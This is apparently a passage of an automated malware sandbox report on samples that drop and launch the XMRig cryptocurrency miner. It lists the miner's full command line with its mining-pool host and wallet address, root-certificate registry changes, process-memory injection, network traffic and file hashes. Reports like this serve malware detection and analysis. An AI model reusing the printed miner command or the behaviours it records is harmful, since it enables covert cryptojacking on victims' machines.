memory/2292-50-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-51-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-52-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-53-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-54-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-55-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-56-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-57-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-58-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-59-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-60-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-61-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-62-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-63-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-64-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-65-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-66-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-67-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-68-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-69-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-70-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-71-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-72-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-73-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-74-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-75-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-76-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-77-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-78-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-79-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-80-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-81-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-82-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-83-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
memory/2292-84-0x00007FF788CD0000-0x00007FF7897D3000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3680 wrote to memory of 3952 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3680 wrote to memory of 3952 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.141.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3952-16-0x000002896C0A0000-0x000002896C0C0000-memory.dmp
memory/3952-17-0x000002896C0F0000-0x000002896C110000-memory.dmp
memory/3952-18-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-20-0x000002896D9E0000-0x000002896DA00000-memory.dmp
memory/3952-19-0x000002896D9C0000-0x000002896D9E0000-memory.dmp
memory/3952-21-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-22-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-25-0x000002896D9E0000-0x000002896DA00000-memory.dmp
memory/3952-24-0x000002896D9C0000-0x000002896D9E0000-memory.dmp
memory/3952-23-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-26-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-27-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-28-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-29-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-30-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-31-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-32-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-33-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-34-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-35-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-36-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-37-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-38-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-39-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-40-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-41-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-42-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-43-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-44-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-45-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-46-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-47-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-48-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-49-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-50-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-51-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-52-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-53-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-54-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-55-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-56-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-57-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-58-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-59-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-60-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-61-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-62-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-63-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-64-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-65-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-66-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-67-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-68-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-69-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-70-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-71-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-72-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-73-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-74-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-75-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-76-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-77-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-78-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-79-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-80-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-81-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-82-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-83-0x00007FF670520000-0x00007FF671023000-memory.dmp
memory/3952-84-0x00007FF670520000-0x00007FF671023000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:01
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 512 wrote to memory of 2584 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 512 wrote to memory of 2584 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2584-16-0x0000012F59170000-0x0000012F59190000-memory.dmp
memory/2584-17-0x0000012F591C0000-0x0000012F591E0000-memory.dmp
memory/2584-18-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-20-0x0000012F59220000-0x0000012F59240000-memory.dmp
memory/2584-19-0x0000012F591E0000-0x0000012F59200000-memory.dmp
memory/2584-21-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-22-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-25-0x0000012F59220000-0x0000012F59240000-memory.dmp
memory/2584-24-0x0000012F591E0000-0x0000012F59200000-memory.dmp
memory/2584-23-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-26-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-27-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-28-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-29-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-30-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-31-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-32-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-33-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-34-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-35-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-36-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-37-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-38-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-39-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-40-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-41-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-42-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-43-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-44-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-45-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-46-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
